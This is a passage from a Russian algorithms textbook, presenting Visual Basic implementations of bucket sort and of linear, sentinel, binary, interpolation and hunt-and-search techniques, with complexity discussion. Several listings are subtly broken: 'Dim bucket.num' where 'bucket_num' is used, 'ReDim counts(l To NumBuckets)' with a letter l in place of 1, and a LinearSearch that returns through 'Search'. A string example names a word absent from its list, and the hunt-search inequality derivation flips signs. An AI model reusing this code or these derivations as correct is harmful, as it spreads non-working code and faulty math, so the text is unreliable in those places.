Если элементы распределены равномерно, в каждый блок попадает примерно одинаковое число элементов. Если в списке N элементов, и алгоритм использует N блоков, в каждый блок попадает всего один или два элемента. Программа может отсортировать их за конечное число шагов, поэтому время выполнения алгоритма в целом порядка O(N).
На практике, распределение данных обычно не является равномерным. В некоторые блоки попадает больше элементов, в другие меньше. Тем не менее, если распределение в целом близко к равномерному, то в каждом из блоков окажется лишь небольшое число элементов.
Проблемы могут возникать, только если список содержит небольшое число различных значений. Например, если все элементы имеют одно и то ж значение, они все будут помещены в один блок. Если алгоритм не обнаружит это, он снова и снова будет помещать все элементы в один и тот же блок, вызвав бесконечную рекурсию и исчерпав все стековое пространство.
Блочная сортировка с применением связного списка
Реализовать алгоритм блочной сортировки на Visual Basic можно различными способами. Во-первых, можно использовать в качестве блоков связные списки. Это облегчает перемещение элементов между блоками в процессе работы алгоритма.
Этот метод может быть более сложным, если элементы изначально расположены в массиве. В этом случае, необходимо перемещать элементы из массива в связный список и обратно в массив после завершения сортировки. Для создания связного списка также требуется дополнительная память. Следующий код демонстрирует алгоритм блочной сортировки с применением связных списков:
Public Sub LinkBucketSort(ListTop As ListCell)
Dim count As Long
Dim min_value As Long
Dim max_value As Long
Dim Value As Long
Dim item As ListCell
Dim nxt As ListCell
Dim bucket() As New ListCell
Dim value_scale As Double
Dim bucket.num As Long
Dim i As Long
Set item = ListTop.NextCell
If item Is Nothing Then Exit Sub
' Подсчитать элементы и найти значения min и max.
count = 1
min_value = item.Value
max_value = min_value
Set item = item.NextCell
Do While Not (item Is Nothing)
count = count + 1
Value = item.Value
If min_value > Value Then min_value = Value
If max_value < Value Then max_value = Value
Set item = item.NextCell
Loop
' Если min_value = max_value, значит, есть единственное
' значение, и список отсортирован.
If min_value = max_value Then Exit Sub
' Если в списке не более, чем CutOff элементов,
' завершить сортировку процедурой LinkInsertionSort.
If count <= CutOff Then
LinkInsertionSort ListTop
Exit Sub
End If
' Создать пустые блоки.
ReDim bucket(1 To count)
value_scale = _
CDbl(count - 1) / _
CDbl(max_value - min_value)
' Разместить элементы в блоках.
Set item = ListTop.NextCell
Do While Not (item Is Nothing)
Set nxt = item.NextCell
Value = item.Value
If Value = max_value Then
bucket_num = count
Else
bucket_num = _
Int((Value - min_value) * _
value_scale) + 1
End If
Set item.NextCell = bucket (bucket_num).NextCell
Set bucket(bucket_num).NextCell = item
Set item = nxt
Loop
' Рекурсивная сортировка блоков, содержащих
' более одного элемента.
For i = 1 To count
If Not (bucket(i).NextCell Is Nothing) Then _
LinkBucketSort bucket(i)
Next i
' Объединить отсортированные списки.
Set ListTop.NextCell = bucket(count).NextCell
For i = count - 1 To 1 Step -1
Set item = bucket(i).NextCell
If Not (item Is Nothing) Then
Do While Not (item.NextCell Is Nothing)
Set item = item.NextCell
Loop
Set item.NextCell = ListTop.NextCell
Set ListTop.NextCell= bucket(i).NextCell
End If
Next i
End Sub
=========257-258
Эта версия блочной сортировки намного быстрее, чем сортировка вставкой с использованием связных списков. В тесте на компьютере с процессором Pentium с тактовой частотой 90 МГц сортировке вставкой потребовалось 6,65 секунд для сортировки 2000 элементов, блочная сортировка заняла 1,32 секунды. Для более длинных списков разница будет еще больше, так как производительность сортировки вставкой порядка O(N2).
Блочная сортировка на основе массива
Блочную сортировку также можно реализовать в массиве, используя идеи подобные тем, которые используются при сортировке подсчетом. При каждом вызове алгоритма, вначале подсчитывается число элементов, которые относятся к каждому блоку. Потом на основе этих данных рассчитываются смещения во временном массиве, которые затем используются для правильного расположения элементов в массиве. В конце концов, блоки рекурсивно сортируются, и отсортированные данные перемещаются обратно в исходный массив.
Public Sub ArrayBucketSort(List() As Long, Scratch() As Long, _
min As Long, max As Long, NumBuckets As Long)
Dim counts() As Long
Dim offsets() As Long
Dim i As Long
Dim Value As Long
Dim min_value As Long
Dim max_value As Long
Dim value_scale As Double
Dim bucket_num As Long
Dim next_spot As Long
Dim num_in_bucket As Long
' Если в списке не более чем CutOff элементов,
' закончить сортировку процедурой SelectionSort.
If max - min + 1 < CutOff Then
Selectionsort List(), min, max
Exit Sub
End If
' Найти значения min и max.
min_value = List(min)
max_value = min_value
For i = min + 1 To max
Value = List(i)
If min_value > Value Then min_value = Value
If max_value < Value Then max_value = Value
Next i
' Если min_value = max_value, значит, есть единственное
' значение, и список отсортирован.
If min_value = max_value Then Exit Sub
' Создать пустой массив с отсчетами блоков.
ReDim counts(l To NumBuckets)
value_scale = _
CDbl (NumBuckets - 1) / _
CDbl (max_value - min_value)
' Создать отсчеты блоков.
For i = min To max
If List(i) = max_value Then
bucket_num = NumBuckets
Else
bucket_num = _
Int((List(i) - min_value) * _
value_scale) + 1
End If
counts(bucket_num) = counts(bucket_num) + 1
Next i
' Преобразовать отсчеты в смещение в массиве.
ReDim offsets(l To NumBuckets)
next_spot = min
For i = 1 To NumBuckets
offsets(i) = next_spot
next_spot = next_spot + counts(i)
Next i
' Разместить значения в соответствующих блоках.
For i = min To max
If List(i) = max_value Then
bucket_num = NumBuckets
Else
bucket_num = _
Int((List(i) - min_value) * _
value_scale) + 1
End If
Scratch (offsets (bucket_num)) = List(i)
offsets(bucket_num) = offsets(bucket_num) + 1
Next i
' Рекурсивная сортировка блоков, содержащих
' более одного элемента.
next_spot = min
For i = 1 To NumBuckets
If counts(i) > 1 Then ArrayBucketSort _
Scratch(), List(), next_spot, _
next_spot + counts(i) - 1, counts(i)
next_spot = next_spot + counts(i)
Next i
' Скопировать временный массив назад в исходный список.
For i = min To max
List(i) = Scratch(i)
Next i
End Sub
Изза накладных расходов, которые требуются для работы со связными списками, эта версия блочной сортировки работает намного быстрее, чем версия с использованием связных списков. Тем не менее, используя методы работы с псевдоуказателями, описанные во 2 главе, можно улучшить производительность версии с использованием связных списков, так что обе версии станут практически эквивалентными по скорости.
Новую версию также можно сделать еще быстрее, используя функцию API MemCopy для копирования элементов из временного массива обратно в исходный список. Эта усовершенствованную версию алгоритма демонстрирует программа FastSort.
===========259-261
Резюме
В таб. 9.4 приведены преимущества и недостатки алгоритмов сортировки, описанных в этой главе, из которых можно вывести несколько правил, которые могут помочь вам выбрать алгоритм сортировки.
Эти правила, изложенные в следующем списке, и информация в табл. 9.4 может помочь вам подобрать алгоритм, который обеспечит максимальную производительность:
если вам нужно быстро реализовать алгоритм сортировки, используйте быструю сортировку, а затем при необходимости поменяйте алгоритм;
если более 99 процентов списка уже отсортировано, используйте пузырьковую сортировку;
если список очень мал (100 или менее элементов), используйте сортировку выбором;
если значения находятся в связном списке, используйте блочную сортировку на основе связного списка;
если элементы в списке — целые числа, разброс значений которых невелик (до нескольких тысяч), используйте сортировку подсчетом;
если значения лежат в широком диапазоне и не являются целыми числами, используйте блочную сортировку на основе массива;
если вы не можете тратить дополнительную память, которая требуется для блочной сортировки, используйте быструю сортировка
Если вы знаете структуру данных и различные алгоритмы сортировки, вы можете выбрать алгоритм, наиболее подходящий для ваших нужд.
@Таблица 9.4. Преимущества и недостатки алгоритмов сортировки
=========263
Глава 10. Поиск
После того, как список элементов отсортирован, может понадобиться найти определенный элемент в списке. В этой главе описаны некоторые алгоритмы для поиска элементов в упорядоченных списках. Она начинается с краткого описания сортировки методом полного перебора. Хотя этот алгоритм выполняется не так быстро, как другие, метод полного перебора является очень простым, что облегчает его реализацию и отладку. Изза простоты этого метода, сортировка полным перебором также выполняется быстрее других алгоритмов для очень маленьких списков.
Далее в главе описан двоичный поиск. При двоичном поиске список многократно разбивается на части, при этом для больших списков такой поиск выполняется намного быстрее, чем полный перебор. Заключенная в этом методе идея достаточно проста, но реализовать ее довольно сложно.
Затем в главе описан интерполяционный поиск. Так же, как и в методе двоичного поиска, исходный список при этом многократно разбивается на части. При использовании интерполяционного поиска, алгоритм делает предположения о том, где может находиться искомый элемент, поэтому он выполняется намного быстрее, если данные в списках распределены равномерно.
В конце главы обсуждаются методы следящего поиска. Применение этого метода иногда уменьшает время поиска в несколько раз.
Примеры программ
Программа Search демонстрирует все описанные в главе алгоритмы. Введите значение элементов, которые должен содержать список, и затем нажмите на кнопку Make List (Создать список), и программа создаст список на основе массива, в котором каждый элемент больше предыдущего на число от 0 до 5. Программа выводит значение наибольшего элемента в списке, чтобы вы представляли диапазон значений элементов.
После создания списка выберите алгоритмы, которые вы хотите использовать, установив соответствующие флажки. Затем введите значение, которое вы хотите найти и нажмите на кнопку Search (Поиск), и программа выполнит поиск элемента при помощи выбранного вами алгоритма. Так как список содержит не все возможные элементы в заданном диапазоне значений, то вам может понадобиться ввести несколько различных значений, прежде чем одно из них найдется в списке.
Программа также позволяет задать число повторений для каждого из алгоритмов поиска. Некоторые алгоритмы выполняются очень быстро, поэтому для того, чтобы сравнить их скорость, может понадобиться задать для них большое число повторений.
=======265
На рис. 10.1 показано окно программы Search после поиска элемента со значением 250.000. Этот элемент находился на позиции 99.802 в списке из 100.000 элементов. Чтобы найти этот элемент, потребовалось проверить 99.802 элемента при использовании алгоритма полного перебора, 16 элементов — при использовании двоичного поиска и всего 3 — при выполнении интерполяционного поиска.
Поиск методом полного перебора
При выполнении линейного (linear) поиска или поиска методом полного перебора (exhaustive search), поиск ведется с начала списка, и элементы перебираются последовательно, пока среди них не будет найден искомый.
Public Function LinearSearch(target As Long) As Long
Dim i As Long
For i = 1 To NumItems
If List(i) >= target Then Exit For
Next i
If i > NumItems Then
Search = 0 ' Элемент не найден.
Else
Search = i ' Элемент найден.
End If
End Function
Так как этот алгоритм проверяет элементы последовательно, то он находит элементы в начале списка быстрее, чем элементы, расположенные в конце. Наихудший случай для этого алгоритма возникает, если элемент находится в конце списка или вообще не присутствует в нем. В этих случаях, алгоритм проверяет все элементы в списке, поэтому время его выполнения сложность в наихудшем случае порядка O(N).
@Рис. 10.1. Программа Search
========266
Если элемент находится в списке, то в среднем алгоритм проверяет N/2 элементов до того, как обнаружит искомый. Таким образом, в усредненном случае время выполнения алгоритма также порядка O(N).
Хотя алгоритмы, которые выполняются за время порядка O(N), не являются очень быстрыми, этот алгоритм достаточно прост, чтобы давать на практике неплохие результаты. Для небольших списков этот алгоритм имеет приемлемую производительность.
Поиск в упорядоченных списках
Если список упорядочен, то можно слегка модифицировать алгоритм полного перебора, чтобы немного повысить его производительность. В этом случае, если во время выполнения поиска алгоритм находит элемент со значением, большим, чем значение искомого элемента, то он завершает свою работу. При этом искомый элемент не находится в списке, так как иначе он бы встретился раньше.
Например, предположим, что мы ищем значение 12 и дошли до значения 17. При этом мы уже прошли тот участок списка, в котором мог бы находится элемент со значением 12, значит, элемент 12 в списке отсутствует. Следующий код демонстрирует доработанную версию алгоритма поиска полным перебором:
Public Function LinearSearch(target As Long) As Long
Dim i As Long
NumSearches = 0
For i = 1 To NumItems
NumSearches = NumSearches + 1
If List(i) >= target Then Exit For
Next i
If i > NumItems Then
LinearSearch = 0 ' Элемент не найден.
ElseIf List(i) <> target Then
LinearSearch = 0 ' Элемент не найден.
Else
LinearSearch = i ' Элемент найден.
End If
End Function
Эта модификация уменьшает время выполнения алгоритма, если элемент отсутствует в списке. Предыдущей версии поиска требовалось проверить весь список до конца, если искомого элемента в нем не было. Новая версия остановится, как только обнаружит элемент больший, чем искомый.
Если искомый элемент расположен случайно между наибольшим и наименьшим элементами в списке, то в среднем алгоритму понадобится порядка O(N) шагов, чтобы определить, что искомый элемент отсутствует в списке. Время выполнения при этом имеет тот же порядок, но на практике его производительность будет немного выше. Программа Search использует эту версию алгоритма.
======267
Поиск в связных списках
Поиск методом полного перебора — это единственный способ поиска в связных списках. Так как доступ к элементам возможен только при помощи указателей NextCell на следующий элемент, то необходимо проверить по очереди все элементы с начала списка, чтобы найти искомый.
Так же, как и в случае поиска полным перебором в массиве, если список упорядочен, то можно прекратить поиск, если найдется элемент со значением, большим, чем значение искомого элемента.
Public Function LListSearch(target As Long) As SearchCell
Dim cell As SearchCell
NumSearches = 0
Set cell = ListTop.NextCell
Do While Not (cell Is Nothing)
NumSearches = NumSearches + 1
If cell.Value >= target Then Exit Do
Set cell = cell.NextCell
Loop
If Not (cell Is Nothing) Then
If cell.Value = target Then
Set LListSearch = cell ' Элемент найден.
End If
End If
End Function
Программа Search использует этот алгоритм для поиска элементов в связном списке. Этот алгоритм выполняется немного медленнее, чем алгоритм полного перебора в массиве изза дополнительных накладных расходов, которые связаны с управлением указателями на объекты. Заметьте, что программа Search строит связные списки, только если список содержит не более 10.000 элементов.
Чтобы алгоритм выполнялся немного быстрее, в него можно внести еще одно изменение. Если хранить указатель на конец списка, то можно добавить в конец списка ячейку, которая будет содержать искомый элемент. Этот элемент называется сигнальной меткой (sentinel), и служит для тех же целей, что и сигнальные метки, описанные во 2 главе. Это позволяет обрабатывать особый случай конца списка так же, как и все остальные.
В этом случае, добавление метки в конец списка гарантирует, что в конце концов искомый элемент будет найден. При этом программа не может выйти за конец списка, и нет необходимости проверять условие Not (cell Is Nothing) в каждом цикле While.
Public Function SentinelSearch(target As Long) As SearchCell
Dim cell As SearchCell
Dim sentinel As New SearchCell
NumSearches = 0
' Установить сигнальную метку.
sentinel.Value = target
Set ListBottom.NextCell = sentinel
' Найти искомый элемент.
Set cell = ListTop.NextCell
Do While cell.Value < target
NumSearches = NumSearches + 1
Set cell = cell.NextCell
Loop
' Определить найден ли искомый элемент.
If Not ((cell Is sentinel) Or _
(cell.Value <> target)) _
Then
Set SentinelSearch = cell ' Элемент найден.
End If
' Удалить сигнальную метку.
Set ListBottom.NextCell = Nothing
End Function
Хотя может показаться, что это изменение незначительно, проверка Not (cell Is Nothing) выполняется в цикле, который вызывается очень часто. Для больших списков этот цикл вызывается множество раз, и выигрыш времени суммируется. В Visual Basic, этот версия алгоритма поиска в связных списках выполняется на 20 процентов быстрее, чем предыдущая версия. В программе Search приведены обе версии этого алгоритма, и вы можете сравнить их.
Некоторые алгоритмы используют потоки для ускорения поиска в связных списках. Например, при помощи указателей в ячейках списка можно организовать список в виде двоичного дерева. Поиск элемента с использованием этого дерева займет время порядка O(log(N)), если дерево сбалансировано. Такие структуры данных уже не являются просто списками, поэтому мы не обсуждаем их в этой главе. Чтобы больше узнать о деревьях, обратитесь к 6 и 7 главам
Двоичный поиск
Как уже упоминалось в предыдущих разделах, поиск полным перебором выполняется очень быстро для небольших списков, но для больших списков намного быстрее выполняется двоичный поиск. Алгоритм двоичного поиска (binary search) сравнивает элемент в середине списка с искомым. Если искомый элемент меньше, чем найденный, то алгоритм продолжает поиск в первой половине списка, если больше — в правой половине. На рис. 10.2 этот процесс изображен графически.
Хотя по своей природе этот алгоритм является рекурсивным, его достаточно просто записать и без применения рекурсии. Так как этот алгоритм прост для понимания в любом варианте (с рекурсией или без), то мы приводим здесь его нерекурсивную версию, которая содержит меньше вызовов функций.
Основная заключенная в этом алгоритме идея проста, но детали ее реализации достаточно сложны. Программе приходится аккуратно отслеживать часть массива, которая может содержать искомый элемент, иначе она может его пропустить.
Алгоритм использует две переменные, min и max, в которых находятся минимальный и максимальный индексы ячеек массива, которые могут содержать искомый элемент. Во время выполнения алгоритма, индекс искомой ячейки всегда будет лежать между min и max. Другими словами, min <= target index <= max.
==========269
@Рис. 10.2. Двоичный поиск элемента со значением 44
Во время каждого прохода, алгоритм выполняет присвоение middle = (min + max) / 2 и проверяет ячейку, индекс которой равен middle. Если ее значение равно искомому, то цель найдена и алгоритм завершает свою работу.
Если значение искомого элемента меньше, чем значение среднего, то алгоритм устанавливает значение переменной max равным middle – 1 и продолжает поиск. Так как теперь индексы элементов, которые могут содержать искомый элемент, находятся в диапазоне от min до middle – 1, то программа при этом выполняет поиск в первой половине списка.
В конце концов, программа либо найдет искомый элемент, либо наступит момент, когда значение переменной min станет больше, чем значение max. Поскольку индекс искомого элемента должен находиться между минимальным и максимальным возможными индексами, это означает, что искомый элемент отсутствует в списке.
Следующий код демонстрирует выполнение двоичного поиска в программе Search:
Public Function BinarySearch(target As Long) As Long
Dim min As Long
Dim max As Long
Dim middle As Long
NumSearches = 0
' Во время поиска индекс искомого элемента будет находиться
' между Min и Max: Min <= target index <= Max
min = 1
max = NumItems
Do While min <= max
NumSearches = NumSearches + 1
middle = (max + min) / 2
If target = List(middle) Then ' Мы нашли искомый элемент!
BinarySearch = middle
Exit Function
ElseIf target < List(middle) Then ' Поиск в левой половине.
max = middle - 1
Else ' Поиск в правой половине.
min = middle + 1
End If
Loop
' Если мы оказались здесь, то искомого элемента нет в списке.
BinarySearch = 0
End Function
На каждом шаге число элементов, которые еще могут иметь искомое значение, уменьшается вдвое. Для списка размера N, алгоритму может потребоваться максимум O(log(N)) шагов, чтобы найти любой элемент или определить, что его нет в списке. Это намного быстрее, чем в случае применения алгоритма полного перебора. Полный перебор списка из миллиона элементов потребовал бы в среднем 500.000 шагов. Алгоритму двоичного поиска потребуется не больше, чем log(1.000.000) или 20 шагов.
Интерполяционный поиск
Двоичный поиск обеспечивает значительное увеличение скорости поиска по сравнению с полным перебором, так как он исключает большие части списка, не проверяя при этом значения исключаемых элементов. Если, кроме того, известно, что значения элементов распределены достаточно равномерно, то можно исключать на каждом шаге еще больше элементов, используя интерполяционный поиск (interpolation search).
Интерполяцией называется процесс предсказания неизвестных значений на основе имеющихся. В данном случае, индексы известных значений в списке используются для определения возможного положения искомого элемента в списке.
Например, предположим, что имеется тот же самый список значений, показанный на рис. 10.2. Этот список содержит 20 элементов со значениями между 1 и 70. Предположим теперь, что требуется найти элемент в списке, имеющий значение 44. Значение 44 составляет 64 процента расстояния между 1 и 70 на шкале чисел. Если считать, что значения элементов распределены равномерно, то можно предположить, что искомый элемент расположен примерно в точке, которая составляет 64 процента от размера списка, и занимает позицию 13.
Если позиция, выбранная при помощи интерполяции, оказывается неправильной, то алгоритм сравнивает искомое значение со значением элемента в выбранной позиции. Если искомое значение меньше, то поиск продолжается в первой части списка, если больше — во второй части. На рис. 10.3 графически изображен интерполяционный поиск.
При двоичном поиске список последовательно разбивается посередине на две части. Интерполяционный поиск каждый раз разбивает список, пытаясь найти ближайший к искомому элемент в списке, при этом точка разбиения определяется следующим кодом:
middle = min + (target - List(min)) * _
((max - min) / (List(max) - List(min)))
========270-271
@Рис. 10.3 Интерполяционный поиск значения 44
Этот оператор помещает значение middle между min и max в таком же соотношении, в каком искомое значение находится между List(min) и List(max). Если искомый элемент находится рядом с List(min), то разность target – List(min) почти равна нулю. Тогда все соотношение целиком выглядит почти как middle = min + 0, поэтому значение переменной middle почти равно min. Смысл этого заключается в том, что если индекс элемента почти равен min, то его значение почти равно List(min).
Аналогично, если искомый элемент находится рядом с List(max), то разность target – List(min) почти равна разности List(max) – List(min). Их частное почти равно единице, и соотношение выглядит почти как middle = min + (max – min), или middle = max, если упростить выражение. Смысл этого соотношения заключается в том, что если значение элемента близко к List(max), то его индекс почти равен max.
После того, как программа вычислит значение middle, она сравнивает значение элемента в этой позиции с искомым так же, как и в алгоритме двоичного поиска. Если эти значения совпадают, то искомый элемент найден и процесс закончен. Если значение искомого элемента меньше, чем значение найденного, то программа устанавливает значение max равным middle – 1 и продолжает поиск элементов списка с меньшими значениями. Если значение искомого элемента больше, чем значение найденного, то программа устанавливает значение min равным middle + 1 и продолжает поиск элементов списка с большими значениями.
Заметьте, что в знаменателе соотношения, которое находит новое значение переменной middle, находится разность (List(max) – Lsit(min)). Если значения List(max) и List(min) одинаковы, то произойдет деление на ноль и программа аварийно завершит работу. Такое может произойти, если два элемента в списке имеют одинаковые значения. Так как алгоритм поддерживает соотношение min <= target index <= max, то эта проблема может также возникнуть, если min будет расти, а max уменьшаться до тех пор, пока их значения не сравняются.
Чтобы справиться с этой проблемой, программа перед выполнением операции деления проверяет, не равны ли List(max) и List(min). Если это так, значит осталось проверить только одно значение. При этом программа просто проверяет, совпадает ли оно с искомым.
Еще одна тонкость заключается в том, что вычисленное значение middle не всегда лежит между min и max. В простейшем случае это может быть так, если значение искомого элемента выходит за пределы диапазона значений элементов в списке. Предположим, что мы пытаемся найти значение 300 в списке из элементов 100, 150 и 200. На первом шаге вычислений min = 1 и max = 3. Тогда middle = 1 + (300 – List(1)) * (3 – 1) / (List(3) – List(1)) = 1 + (300 – 100) * 2 / (200 – 100) = 5. Индекс 5 не только не находится в диапазоне между min и max, он также выходит за границы массива. Если программа попытается обратиться к элементу массива List(5), то она аварийно завершит работу с сообщением об ошибке “Subscript out of range”.
===========272
Похожая проблема возникает, если значения элементов распределены между min и max очень неравномерно. Предположим, что мы хотим найти значение 100 в списке 0, 1, 2, 199, 200. При первом вычислении значения переменной middle, мы получим в программе middle = 1 + (100 – 0) * (5 – 1) / (200 – 0) = 3. Затем программа сравнивает значение элемента List(3) с искомым значением 100. Так как List(3) = 2, что меньше 100, она задает min = middle + 1, то есть min = 4.
При следующем вычисления значения переменной middle, программа находит middle = 4 + (100 – 199) * (5 – 4) / (200 – 199) = -98. Значение –98 не попадает в диапазон min <= target index <= max и также далеко выходит за границы массива.
Если рассмотреть процесс вычисления переменной middle, то можно увидеть, что существуют два варианта, при которых новое значение может оказаться меньше, чем min или больше, чем max. Вначале предположим, что middle меньше, чем min.
min + (target - List(min)) * ((max - min) / (List(max) - List(min))) < min
После вычитания min из обеих частей уравнения, получим:
(target - List(min)) * ((max - min) / (List(max) - List(min))) < 0
Так как max >= min, то разность (max – min) должна быть больше нуля. Так как List(max) >= List(min), то разность (List(max) – List(min)) также должна быть больше нуля. Тогда все значение может быть меньше нуля, только если (target – List(min)) меньше нуля. Это означает, что искомое значение меньше, чем значение элемента List(min). В этом случае, искомый элемент не может находиться в списке, так как все элементы списка со значением меньшим, чем List(min) уже были исключены.
Теперь предположим, что middle больше, чем max.
min + (target - List(min)) * ((max - min) / (List(max) - List(min))) > max
После вычитания min из обеих частей уравнения, получим:
(target - List(min)) * ((max - min) / (List(max) - List(min))) > 0
Умножение обеих частей на (List(max) – List(min)) / (max – min) приводит соотношение к виду:
target – List(min) > List(max) – List(min)
И, наконец, прибавив к обеим частям List(min), получим:
target > List(max)
Это означает, что искомое значение больше, чем значение элемента List(max). В этом случае, искомое значение не может находиться в списке, так как все элементы списка со значениями большими, чем List(max) уже были исключены.
==========273
Учитывая все эти результаты, получаем, что новое значение переменной middle может выйти из диапазона между min и max только в том случае, если искомое значение выходит за пределы диапазона от List(min) до List(max). Алгоритм может использовать этот факт при вычислении нового значения переменной middle. Он вначале проверяет, находится ли новое значение между min и max. Если нет, то искомого элемента нет в списке и работа алгоритма завершена.
Следующий код демонстрирует реализацию интерполяционного поиска в программе Search:
Public Function InterpSearch(target As Long) As Long
Dim min As Long
Dim max As Long
Dim middle As Long
min = 1
max = NumItems
Do While min <= max
' Избегаем деления на ноль.
If List(min) = List(max) Then
' Это искомый элемент (если он есть в списке).
If List(min) = target Then
InterpSearch = min
Else
InterpSearch = 0
End If
Exit Function
End If
' Найти точку разбиения списка.
middle = min + (target - List(min)) * _
((max - min) / (List(max) - List(min)))
' Проверить, не вышли ли мы за границы.
If middle < min Or middle > max Then
' Искомого элемента нет в списке.
InterpSearch = 0
Exit Function
End If
NumSearches = NumSearches + 1
If target = List(middle) Then ' Искомый элемент найден.
InterpSearch = middle
Exit Function
ElseIf target < List(middle) Then ' Поиск в левой части.
max = middle - 1
Else ' Поиск в правой части.
min = middle + 1
End If
Loop
' Если мы дошли до этой точки, то элемента нет в списке.
InterpSearch = 0
End Function
Двоичный поиск выполняется очень быстро, а интерполяционный еще быстрее. В одном из тестов, двоичный поиск потребовал в 7 раз больше времени для поиска значений в списке из 100.000 элементов. Эта разница могла бы быть еще больше, если бы данные находились на диске или какомлибо другом медленном устройстве. Хотя при интерполяционном поиске на вычисления уходит больше времени, чем в случае двоичного поиска, за счет меньшего числа обращений к диску мы сэкономили бы гораздо больше времени.
Строковые данные
Если данные в списке представляют собой строки, можно применить два различных подхода. Более простой состоит в применении двоичного поиска. При двоичном поиске значения элементов сравниваются непосредственно, поэтому этот метод может легко работать со строковыми данными.
С другой стороны, интерполяционный поиск использует численные значения элементов данных для вычисления возможного положения искомого элемента в списке. Если элементы представляют собой строки, то этот алгоритм не может непосредственно использовать значения данных для вычисления предполагаемого положения искомого элемента.
Если строки достаточно короткие, то можно закодировать их при помощи целых чисел или чисел формата long или double, используя методы, которые были описаны в 9 главе. После этого можно использовать для нахождения элементов в списке интерполяционный поиск.
Если строки слишком длинные, и их нельзя закодировать даже числами в формате double, то все еще можно использовать для интерполяции значения строк. Вначале найдем первый отличающийся символ для строк List(min) и List(max). Затем закодируем его и следующие два символа в каждой строке при помощи методов из 9 главы. Затем можно использовать эти значения для выполнения интерполяционного поиска.
Например, предположим, что мы ищем строку TARGET в списке TABULATE, TANTRUM, TARGET, TATTERED, TAXATION. Если min = 1 и max = 5, то проверяются значения TABULATE и THEATER. Эти строки отличаются во втором символе, поэтому нужно рассматривать три символа, начинающиеся со второго. Это будут символы ABU для List(1), AXA для List(5) и ARG для искомой строки.
Эти значения кодируются числами 804, 1378 и 1222 соответственно. Подставляя эти значения в формулу для переменной middle, получим:
middle = min + (target - List(min)) * ((max - min) / (List(max) - List(min)))
= 1 + (1222 – 804) * ((5 – 1) / (1378 – 804))
= 2,91
=========275
Это примерно равно 3, поэтому следующее значение переменной middle равно 3. Это положение строки TARGET в списке, поэтому поиск при этом заканчивается.
Следящий поиск
Чтобы начать двоичный следящий поиск (binary hunt and search), сравним искомое значение из предыдущего поиска с новым искомым значением. Если новое значение меньше, начнем слежение влево, если больше — вправо.
Для выполнения слежения влево, установим значения переменных min и max равными индексу, полученному во время предыдущего поиска. Затем уменьшим значение min на единицу и сравним искомое значение со значением элемента List(min). Если искомое значение меньше, чем значение List(min), установим max = min и min = min –2, и сделаем еще одну проверку. Если искомое значение все еще меньше, установим max = min и min = min –4, если это не поможет, установим max = min и min = min –8 и так далее. Продолжим устанавливать значение переменной max равным значению переменной min и вычитать очередные степени двойки из значения переменной min до тех пор, пока не найдется значение min, для которого значение элемента List(min) будем меньше искомого значения.
Необходимо следить за тем, чтобы не выйти за границы массива, если min меньше, чем нижняя граница массива. Если в какойто момент это окажется так, то min нужно присвоить значение нижней границы массива. Если при этом значение элемента List(min) все еще больше искомого, значит искомого элемента нет в списке. На рис. 10.4 показан следящий поиск элемента со значением 17 влево от предыдущего искомого элемента со значением 44.
Слежение вправо выполняется аналогично. Вначале значения переменных min и max устанавливаются равными значению индекса, полученного во время предыдущего поиска. Затем последовательно устанавливается min = max и max = max + 1, min = max и max = max + 2, min = max и max = max + 4, и так далее до тех пор, пока в какойто точке значение элемента массива List(max) не станет больше искомого. И снова необходимо следить за тем, чтобы не выйти за границу массива.
После завершения фазы слежения известно, что индекс искомого элемента находится между min и max. После этого можно использовать обычный двоичный поиск для нахождения точного положения искомого элемента.
@Рис. 10.4. Следящий поиск значения 17 из значения 44
===============276
Если новый искомый элемент находится недалеко от предыдущего, то алгоритм следящего поиска очень быстро найдет значения max и min. Если новый и старый искомые элементы отстоят друг от друга на P позиций, то потребуется порядка log(P) шагов для следящего поиска новых значений переменных min и max.
Предположим, что мы начали обычный двоичный поиск без фазы слежения. Тогда потребуется порядка log(NumItems) – log(P) шагов для того, чтобы значения min и max были на расстоянии не больше, чем P позиций друг от друга. Это означает, что следящий поиск будет быстрее обычного двоичного поиска, если log(P) < log(NumItems) – log(P). Прибавив к обеим частям уравнения log(P), получим 2 * log(P) > log(NumItems). Если возвести обе части уравнения в степень двойки, получим 22*log(P) < 2log(NumItems) или (2log(P))2 < NumItems, или после упрощения P2 < NumItems.
Из этого соотношения видно, что следящий поиск будет выполняться быстрее, если расстояние между последовательными искомыми элементами будет меньше, чем квадратный корень из числа элементов в списке. Если следующие друг за другом искомые элементы расположены далеко друг от друга, то лучше использовать обычный двоичный поиск.
Интерполяционный следящий поиск
Используя методы из предыдущих разделов можно выполнить следящий интерполяционный поиск (interpolative hunt and search). Вначале, как и раньше, сравним искомое значение из предыдущего поиска с новым. Если новое искомое значение меньше, начнем слежение влево, если больше — вправо.
Для слежения влево будем теперь использовать интерполяцию, чтобы предположить, где может находиться искомое значение в диапазоне между предыдущим значением и значением элемента List(1). Но это будет просто интерполяционный поиск, в котором min = 1 и max равно индексу, полученному во время предыдущего поиска. После первого шага, фаза слежения заканчивается и дальше можно продолжить обычный интерполяционный поиск.
Аналогично выполняется слежение вправо. Просто приравниваем max = Numitems и устанавливаем min равным индексу, полученному во время предыдущего поиска. Затем продолжаем обычный интерполяционный поиск.
На рис. 10.5 показан интерполяционный поиск элемента со значением 17, начинающийся с предыдущего элемента со значением 44.
Если значения данных расположены почти равномерно, то интерполяционный поиск всегда выбирает значение, которое находится рядом с искомым на первом или последующем шаге. Это означает, что начиная с предыдущего найденного значения, нельзя значительно улучшить этот алгоритм. На первом шаге, даже без использования результата предыдущего поиска, интерполяционный поиск, вероятно, выберет индекс, который находится достаточно близко от индекса искомого элемента.
@Рис. 10.5. Интерполяционный поиск значения 17 из значения 44
=============277
С другой стороны, использование предыдущего значения может помочь в случае, если данные распределены неравномерно. Если известно, что новое искомое значение находится близко к старому, интерполяционный поиск, начинающийся с предыдущего значения, обязательно найдет элемент, который находится рядом с предыдущим найденным. Это означает, что использование в качестве стартовой точки предыдущего найденного значения может давать определенное преимущество.
Результат предыдущего поиска также сильнее ограничивает диапазон возможных положений нового элемента, по сравнению с диапазоном от 1 до NumItems, поэтому алгоритм может сэкономить при этом один или два шага. Это особенно важно, если список находится на диске или какомлибо другом медленном устройстве. Если сохранять результат предыдущего поиска в памяти, то можно, по крайней мере, сравнить новое искомое значение с предыдущим без обращения к диску.
Резюме
Если элементы находятся в связном списке, используйте поиск методом полного перебора. По возможности используйте сигнальную метку в конце списка для ускорения поиска.
